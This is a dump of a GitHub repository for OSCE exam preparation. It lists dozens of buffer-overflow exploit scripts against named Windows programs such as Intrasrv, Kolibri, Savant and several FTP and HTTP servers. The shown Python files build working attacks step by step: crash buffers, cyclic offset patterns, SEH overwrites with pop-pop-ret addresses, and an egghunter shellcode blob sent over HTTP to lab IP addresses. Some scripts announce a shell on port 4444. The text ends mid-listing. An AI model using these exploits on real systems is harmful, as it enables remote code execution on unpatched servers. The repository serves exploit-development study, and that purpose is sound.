├── .DS_Store ├── BoF ├── Egg Hunter BoF │ ├── coolplayer-40151 │ │ ├── 40151.py │ │ └── evil.m3u │ ├── eureka-10235 │ │ ├── eureka_crash.pl │ │ ├── eureka_huntertest.pl │ │ ├── eureka_public_bind_shell.py │ │ ├── eureka_public_meterp_rev_shell.py │ │ └── eureka_shellcode.pl │ ├── intrasrv-25836 │ │ ├── 1st │ │ │ ├── intra_crash.py │ │ │ ├── intra_egghunt.py │ │ │ ├── intra_eip.py │ │ │ ├── intra_jmp_back.py │ │ │ ├── intra_pattern.py │ │ │ ├── intra_poc.py │ │ │ ├── intra_ppr.py │ │ │ └── intrabind.py │ │ └── 2nd │ │ │ ├── backjump.py │ │ │ ├── bind.py │ │ │ ├── crash.py │ │ │ ├── egghunt.py │ │ │ ├── intrasrv.spk │ │ │ ├── pattern.py │ │ │ └── ppr.py │ ├── kolibri-34059 │ │ └── 34059poc.py │ ├── kolibri-fuzzy-15834 │ │ ├── 1st time │ │ │ ├── kol1.py │ │ │ ├── kol2.py │ │ │ ├── kol3.py │ │ │ ├── kol4.py │ │ │ ├── kol5.py │ │ │ ├── kol6.py │ │ │ └── kol7.py │ │ ├── 2nd time │ │ │ ├── kolibri_crash.py │ │ │ ├── kolibri_eip_b.py │ │ │ ├── kolibri_eip_crash.py │ │ │ ├── kolibri_eip_jmp_esp.py │ │ │ ├── kolibri_eip_jmp_esp_b33f_jmp.py │ │ │ ├── kolibri_eip_jmp_esp_b33f_stage2_eip.py │ │ │ ├── kolibri_eip_jmp_esp_jmp_2.py │ │ │ └── kolibri_eip_shellcode_gameover.py │ │ ├── 3rd time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_b.py │ │ │ ├── kol_crash_eip.py │ │ │ ├── kol_crash_eip_jmp_esp.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_hunter_jmp_back_60.py │ │ │ ├── kol_hunter_stage2_pattcreate.py │ │ │ └── kol_shellcode_bind.py │ │ ├── 4th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip.py │ │ │ ├── kol_crash_eip_b.py │ │ │ ├── kol_eip_overwrite_jmp_esp.py │ │ │ ├── kol_hunter.py │ │ │ ├── kol_jmp_back.py │ │ │ ├── kol_shellcode_bind.py │ │ │ └── kol_stage2_eip_cyclic.py │ │ ├── 5th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_EIP_Push_ESP.py │ │ │ ├── kol_crash_add_hunter_and_jmp_back_60.py │ │ │ ├── kol_crash_cyclic_pattern.py │ │ │ ├── kol_crash_cyclic_pattern_confirm_bs.py │ │ │ ├── kol_shellcode_gameover.py │ │ │ └── 
kol_stage2_test_user-agent_cyclic_pattern.py │ │ ├── 6th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip_crash.py │ │ │ ├── kol_crash_eip_crash_b's.py │ │ │ ├── kol_crash_hunter_plus_stage2.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_crash_jmp_esp.py │ │ │ └── kol_shellcode_gameover.py │ │ └── 7th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip_crash_b.py │ │ │ ├── kol_crash_hunter_plus_stage2.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_crash_jmp_esp.py │ │ │ ├── kol_pattern.py │ │ │ └── kol_shellcode_gameover.py │ ├── minishare-15575 │ │ ├── bind.py │ │ ├── bs.py │ │ ├── crash.py │ │ ├── pattern.py │ │ └── users.txt │ ├── savant_3.1_10434 │ │ ├── savant_10434_carr_rocx.py │ │ ├── savant_10434_crash_a.py │ │ ├── savant_10434_crash_b.py │ │ ├── savant_10434_crash_b_00.py │ │ ├── savant_10434_crash_conditional_jump.py │ │ ├── savant_10434_crash_eip.py │ │ ├── savant_10434_crash_eip_overwrite.py │ │ ├── savant_10434_crash_eip_overwrite_short_25_jump.py │ │ ├── savant_10434_egghunter_1.py │ │ ├── savant_10434_egghunter_shellcode_bind.py │ │ ├── savant_10434_jmp_instructions.py │ │ └── savant_pub_exploit_10434.py │ ├── savant_3.1_18401 │ │ ├── savant_18401_crash.py │ │ ├── savant_18401_crash_cyclic.py │ │ ├── savant_18401_crash_cyclic_jmp_esp.py │ │ ├── savant_18401_crash_cyclic_withb.py │ │ ├── savant_18401_hunter.py │ │ ├── savant_18401_jmp_around.py │ │ ├── savant_18401_shellcode_bind.py │ │ ├── savant_18401_shellcode_reverse.py │ │ └── savant_18401_short_jmp.py │ └── xitami-17361 │ │ ├── 1st │ │ ├── xitami_crash.py │ │ ├── xitami_egghunt.py │ │ ├── xitami_eip.py │ │ ├── xitami_jmp.py │ │ ├── xitami_pattern.py │ │ ├── xitami_poc.py │ │ ├── xitami_ppr.py │ │ └── xitami_shellcode.py │ │ └── 2nd │ │ ├── b.py │ │ ├── back.py │ │ ├── crash.py │ │ ├── egghunt.py │ │ ├── jmpesp.py │ │ ├── pattern.py │ │ ├── shellcode.py │ │ └── xitami.spk ├── SEH-BoF │ ├── windows_7_sp1_x64 │ │ └── konica_ftp_server │ │ │ ├── konica_exploit_badchar_testing.py │ │ │ 
└── konica_exploit_shellcode_reverse.py │ ├── windows_xp_sp2 │ │ ├── ikeview_r60_seh │ │ │ ├── ikeview_r60_eip_crash.py │ │ │ ├── ikeview_r60_shellcode_bind.py │ │ │ ├── key.elg │ │ │ └── test.py │ │ └── mooplayer_1.3.0 │ │ │ ├── MooPlayer_crash.m3u │ │ │ ├── MooPlayer_eip_crash.m3u │ │ │ ├── MooPlayer_messagebox.m3u │ │ │ ├── mooplayer_1.3.0_crash.pl │ │ │ ├── mooplayer_1.3.0_eip_crash.pl │ │ │ └── mooplayer_1.3.0_pub_exploit.pl │ └── windows_xp_sp3 │ │ ├── audiocoder │ │ ├── audiocoder.m3u │ │ └── audiocoder_crash.pl │ │ ├── coolplayer+ v2.19.4 │ │ ├── add(reg)+jmp │ │ │ ├── coolplayer_beginning_buffer.pl │ │ │ ├── coolplayer_eip_takeover.pl │ │ │ ├── coolplayer_eip_takeover_1.pl │ │ │ ├── coolplayer_fuzz.pl │ │ │ ├── coolplayer_fuzz1.pl │ │ │ ├── coolplayer_jmp_ebx.pl │ │ │ ├── coolplayer_shellcode_attempt.pl │ │ │ ├── coolplayer_shellcode_calc.pl │ │ │ ├── coolplayer_shellcode_meterp.pl │ │ │ ├── coolplayerbegbuffer.m3u │ │ │ ├── coolplayercrash.m3u │ │ │ ├── coolplayercrash1.m3u │ │ │ ├── coolplayereiptakeover.m3u │ │ │ ├── coolplayereiptakeover1.m3u │ │ │ ├── coolplayerjmpebx.m3u │ │ │ ├── coolplayershell_meterp.m3u │ │ │ ├── coolplayershellcode_att.m3u │ │ │ └── coolplayershellcodecalc.m3u │ │ ├── pop+ret │ │ │ ├── coolplayer_popret_aadmin.m3u │ │ │ ├── coolplayer_popret_addmin.pl │ │ │ ├── coolplayer_popret_find.m3u │ │ │ └── coolplayer_popret_find.pl │ │ ├── popad │ │ │ ├── coolplayer_popad.m3u │ │ │ ├── coolplayer_popad.pl │ │ │ ├── coolplayer_popad2.m3u │ │ │ └── coolplayer_popad2.pl │ │ ├── push(reg)+ret │ │ │ ├── coolplayer_shellcode_pushregret_calc.pl │ │ │ └── coolplayer_shellcode_subregjump_calc.m3u │ │ ├── shortjump │ │ │ ├── coolplayer_shortjump.m3u │ │ │ └── coolplayer_shortjump.pl │ │ └── sub(reg)+jmp │ │ │ ├── coolplayer_shellcode_subregjump_calc.pl │ │ │ └── coolplayershell_subregjump_calc.m3u │ │ ├── dvdxplayer │ │ ├── dvdxplayer_crash.plf │ │ ├── dvdxplayer_crash.py │ │ ├── dvdxplayer_patt_nSEH.py │ │ ├── dvdxplayer_patt_nSEH_SEH.py │ │ ├── 
dvdxplayer_patt_overwrite.plf │ │ ├── dvdxplayer_patt_overwrite.py │ │ └── dvdxplayer_patt_shellcode.py │ │ ├── easychatserver │ │ ├── easychatserver_eip_fuzz.py │ │ ├── easychatserver_fuzz.py │ │ ├── easychatserver_fuzz2.py │ │ ├── easychatserver_overwrite_SEH.py │ │ ├── easychatserver_shellcode.py │ │ └── easychatserver_shortjump.py │ │ ├── easyfilesharing_webserver │ │ ├── easyfilesharing_crash_eip.py │ │ ├── easyfilesharing_shellcode_calc_get.py │ │ └── easyfilesharing_shellcode_calc_head.py │ │ ├── mediacoder_0.8.43.5830 │ │ ├── foo.m3u │ │ ├── mediacoder_b_takeover.py │ │ ├── mediacoder_crash.py │ │ ├── mediacoder_eip_crash.py │ │ └── mediacoder_shellcode_calc.py │ │ ├── millenium_mp3 │ │ ├── c0d3r.mpf │ │ ├── millenium_crash.pl │ │ ├── millenium_eip_b_crash.pl │ │ ├── millenium_eip_crash.pl │ │ ├── millenium_popx2ret_confirm_location_crash.pl │ │ ├── millenium_popx2ret_crash.pl │ │ ├── millenium_popx2ret_smalljump.pl │ │ └── millenium_shellcode.pl │ │ ├── not_completed │ │ ├── easyrmtomp3 │ │ │ └── corelantutpart-2 │ │ │ │ ├── easymp3-ss-overwrite-eip.pl │ │ │ │ └── test1.m3u │ │ └── fuzzysec3 │ │ │ └── div1.py │ │ ├── soritong_mp3_player_1.0 │ │ ├── sori_crash.pl │ │ ├── sori_offset.pl │ │ ├── sori_shellcode_SEH.pl │ │ └── ui.txt │ │ ├── tomabo_mp4_player │ │ ├── tomabo_SEH_nseh_overwrite.m3u │ │ ├── tomabo_SEH_nseh_overwrite.py │ │ ├── tomabo_SEH_nseh_ppr_badchars.m3u │ │ ├── tomabo_SEH_nseh_ppr_badchars.py │ │ ├── tomabo_eip_crash.m3u │ │ ├── tomabo_eip_crash.py │ │ ├── tomabo_shellcode_meterp_reverse.py │ │ └── whatever.m3u │ │ └── total_video_player │ │ ├── Settings.ini │ │ ├── pub_exploit.pl │ │ ├── total_vid_player_calc_shellcode.pl │ │ └── total_vid_player_eip_overwrite.pl └── Vanilla-EIP-Overwrite-BoF │ └── windows_xp_sp3 │ ├── Ability_FTP_Server │ ├── 3afs2.24.py │ ├── 4afs2.24.py │ ├── 5afs2.24.py │ ├── ability_ftp_server_eip1.py │ ├── ability_ftp_server_eip2.py │ ├── ability_ftp_server_fuzz.py │ ├── ability_ftp_server_sc.py │ ├── afs2.2.24.py │ 
└── afs2.34-1.py │ ├── AviosoftDTVPlayerPro │ ├── avisfot_eip_crash.plf │ ├── avisoft_badchars.plf │ ├── avisoft_badchars.py │ ├── avisoft_crash.py │ ├── avisoft_eip_b_crash.plf │ ├── avisoft_eip_b_crash.py │ ├── avisoft_eip_crash.py │ ├── avisoft_shellcode_1.plf │ └── avisoft_shellcode_1.py │ ├── BlazeDVDProfessional │ ├── badchars.txt │ ├── blazeexploit.zip │ ├── dvd_crash.plf │ ├── dvd_crash.py │ ├── dvd_eip_b_overwrite.plf │ ├── dvd_eip_b_overwrite.py │ ├── dvd_eip_badchars.plf │ ├── dvd_eip_badchars.py │ ├── dvd_eip_overwrite.plf │ ├── dvd_eip_overwrite.py │ ├── dvd_shellcode_attempt1.plf │ ├── dvd_shellcode_attempt1.py │ ├── dvd_shellcode_attempt2.plf │ ├── dvd_shellcode_attempt2.py │ ├── dvd_shellcode_attempt3.plf │ └── dvd_shellcode_attempt3.py │ ├── EasyMP3Converter │ ├── easymp3-ss-crash.pl │ ├── easymp3-ss-determine-eip-offset.pl │ ├── easymp3-ss-determine-eip.pl │ ├── easymp3-ss-overwrite-eip-jmp-esp.pl │ ├── easymp3-ss-overwrite-eip.pl │ └── easymp3-ss-sc.pl │ ├── Echo_Server │ ├── echo_server │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ ├── echo_server_3 │ │ ├── badchars.txt │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ └── echo_server_4 │ │ ├── echo_server_badchars1.py │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ ├── FreeSSH │ ├── freessh_badchars.py │ ├── freessh_crash.py │ ├── freessh_eip_b_crash.py │ ├── freessh_eip_crash.py │ └── freessh_shellcode_1.py │ ├── Freefloat_FTP_Server │ ├── freefloat_ftp_server_eip1.py │ ├── freefloat_ftp_server_eip2.py │ ├── freefloat_ftp_server_fuzz.py │ └── freefloat_ftp_server_sc.py │ ├── MicroP │ ├── MicroP.exe │ ├── exploit_crash.mppl │ ├── exploit_eip_b_overwrite.mppl │ ├── exploit_eip_badchars1.mppl │ ├── exploit_eip_badchars2.mppl │ ├── exploit_eip_badchars3.mppl │ ├── exploit_eip_badchars4.mppl │ ├── exploit_eip_overwrite.mppl │ ├── 
exploit_shellcode_attempt1.mppl │ ├── exploit_shellcode_attempt2.mppl │ ├── exploit_shellcode_attempt3.mppl │ ├── exploit_shellcode_attempt4.mppl │ ├── microp_crash.py │ ├── microp_eip_b_overwrite.py │ ├── microp_eip_badchars1.py │ ├── microp_eip_badchars2.py │ ├── microp_eip_badchars3.py │ ├── microp_eip_badchars4.py │ ├── microp_eip_overwrite.py │ ├── microp_shellcode_attempt1.py │ ├── microp_shellcode_attempt2.py │ ├── microp_shellcode_attempt3.py │ └── microp_shellcode_attempt4.py │ ├── Minishare_1.4.1_HTTP_Server │ ├── minishare_1.4.1_http_eip1.py │ ├── minishare_1.4.1_http_eip2.py │ ├── minishare_1.4.1_http_fuzz.py │ └── minishare_1.4.1_http_sc.py │ ├── PCman_FTP_Server │ ├── pcman_ftp_server_eip1.py │ ├── pcman_ftp_server_eip2.py │ ├── pcman_ftp_server_fuzz.py │ └── pcman_ftp_server_sc.py │ ├── Ultramini_HTTP_Server │ ├── ultramini_http_server_eip1.py │ ├── ultramini_http_server_eip2.py │ ├── ultramini_http_server_fuzz.py │ ├── ultramini_http_server_sc.py │ └── umhttp3.py │ └── War-FTP_Server │ ├── war-ftpd-b-crash.py │ ├── war-ftpd-badchars.py │ ├── war-ftpd-crash.py │ ├── war-ftpd-eip_crash.py │ └── war-ftpd-shellcode_meterpreter.py └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/.DS_Store -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/coolplayer-40151/evil.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Egg Hunter BoF/coolplayer-40151/evil.m3u -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 
import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | crash = "A"*4000 9 | shellcode = "B" * 4000 10 | 11 | buffer="GET / HTTP/1.1\r\n" 12 | buffer+="Host: " + crash + "\r\n" 13 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 14 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 15 | buffer+="Content-Length: 1048580\r\n\r\n" 16 | buffer+=shellcode 17 | 18 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 19 | one.connect((target, 80)) 20 | one.send(buffer) 21 | one.close() 22 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"*94 10 | 11 | nseh="\xEB\x80\x90\x90" #jmp back do egghunter 12 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 13 | crash = "\x90"*1427 + egghunter + nseh + seh + "B" *500 14 | shellcode = "T00WT00W" + "C"*500 15 | 16 | buffer="GET / HTTP/1.1\r\n" 17 | buffer+="Host: " + crash + "\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 20 | buffer+="Content-Length: 1048580\r\n\r\n" 21 | buffer+= shellcode 22 | 23 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 24 | one.connect((target, 80)) 25 | one.send(buffer) 26 | one.close() 27 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.1.169" 8 | crash = 
"\x90"*1553 + "B"*4 + "C"*1500 9 | shellcode = "\x90"*1500 10 | 11 | buffer="GET / HTTP/1.1\r\n" 12 | buffer+="Host: " + crash + "\r\n" 13 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 14 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 15 | buffer+="Content-Length: 1048580\r\n\r\n" 16 | buffer+= shellcode 17 | 18 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 19 | one.connect((target, 80)) 20 | one.send(buffer) 21 | one.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_jmp_back.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | nseh="\xEB\x80\x90\x90"#jmp back do egghunter 10 | 11 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 12 | 13 | crash = "\x90"*1549 + nseh + seh + "B"*500 14 | 15 | shellcode = "C"*500 16 | 17 | buffer="GET / HTTP/1.1\r\n" 18 | buffer+="Host: " + crash + "\r\n" 19 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 20 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 21 | buffer+="Content-Length: 1048580\r\n\r\n" 22 | buffer+= shellcode 23 | 24 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 25 | one.connect((target, 80)) 26 | one.send(buffer) 27 | one.close() 28 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_ppr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 10 | crash = "\x90"*1553 + seh + "B" * 1500 11 | shellcode = "A"*2500 12 | 13 | buffer="GET / HTTP/1.1\r\n" 14 | buffer+="Host: " + crash + "\r\n" 15 | 
buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 16 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 17 | buffer+="Content-Length: 1048580\r\n\r\n" 18 | buffer+= shellcode 19 | 20 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 21 | one.connect((target, 80)) 22 | one.send(buffer) 23 | one.close() 24 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/backjump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | nseh = "\xeb\xc4\x90\x90" 20 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 21 | buf = "\x90"*1553 + nseh + seh + "B" * 1500 22 | shellcode = "B" * 1000 23 | 24 | header = ( 25 | 'GET / HTTP/1.1\r\n' 26 | 'Host: %s \r\n' 27 | 'Content-Type: application/x-www-form-urlencoded\r\n' 28 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 29 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | 33 | try: 34 | s.connect((target, port)) 35 | print "[+] Connected" 36 | except: 37 | print "[!] Connection Failed" 38 | sys.exit(0) 39 | 40 | print "[+] Sending payload..." 
41 | s.send(header) 42 | time.sleep(1) 43 | s.close() 44 | 45 | print "[+] Check port 4444 for your shell" 46 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A" * 4000 20 | shellcode = "B" * 1000 21 | 22 | header = ( 23 | 'GET / HTTP/1.1\r\n' 24 | 'Host: %s \r\n' 25 | 'Content-Type: application/x-www-form-urlencoded\r\n' 26 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 27 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | 31 | try: 32 | s.connect((target, port)) 33 | print "[+] Connected" 34 | except: 35 | print "[!] Connection Failed" 36 | sys.exit(0) 37 | 38 | print "[+] Sending payload..." 
39 | s.send(header) 40 | time.sleep(1) 41 | s.close() 42 | 43 | print "[+] Check port 4444 for your shell" 44 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | egghunt = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 20 | nseh = "\xeb\xc4\x90\x90" 21 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 22 | buf = "\x90"*1521 + egghunt + nseh + seh + "B" * 500 23 | shellcode = "T00WT00W" + "C" * 500 24 | 25 | header = ( 26 | 'GET / HTTP/1.1\r\n' 27 | 'Host: %s \r\n' 28 | 'Content-Type: application/x-www-form-urlencoded\r\n' 29 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 30 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 31 | 32 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 33 | 34 | try: 35 | s.connect((target, port)) 36 | print "[+] Connected" 37 | except: 38 | print "[!] Connection Failed" 39 | sys.exit(0) 40 | 41 | print "[+] Sending payload..." 
42 | s.send(header) 43 | time.sleep(1) 44 | s.close() 45 | 46 | print "[+] Check port 4444 for your shell" 47 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/intrasrv.spk: -------------------------------------------------------------------------------- 1 | s_string("GET"); 2 | s_string(" "); 3 | s_string("/ "); 4 | s_string("HTTP/1.1"); 5 | s_string("\r\n"); 6 | s_string_variable("Host: "); 7 | s_string("192.168.37.131"); 8 | s_string("\r\n"); 9 | s_string("Content-Type: "); 10 | s_string("application/x-www-form-urlencoded\r\n"); 11 | s_string("User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 12 | s_string_variable("Content-Length: 1048580\r\n\r\n"); 13 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/ppr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 20 | buf = "\x90"*1557 + seh + "B" * 1500 21 | shellcode = "B" * 1000 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s \r\n' 26 | 'Content-Type: application/x-www-form-urlencoded\r\n' 27 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 28 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 29 | 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | 32 | try: 33 | s.connect((target, port)) 34 | print "[+] Connected" 35 | except: 36 | print "[!] Connection Failed" 37 | sys.exit(0) 38 | 39 | print "[+] Sending payload..." 
40 | s.send(header) 41 | time.sleep(1) 42 | s.close() 43 | 44 | print "[+] Check port 4444 for your shell" 45 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stagel = "A" * 600 8 | 9 | buffer = ( 10 | "HEAD /" + Stagel + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | 
"Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st 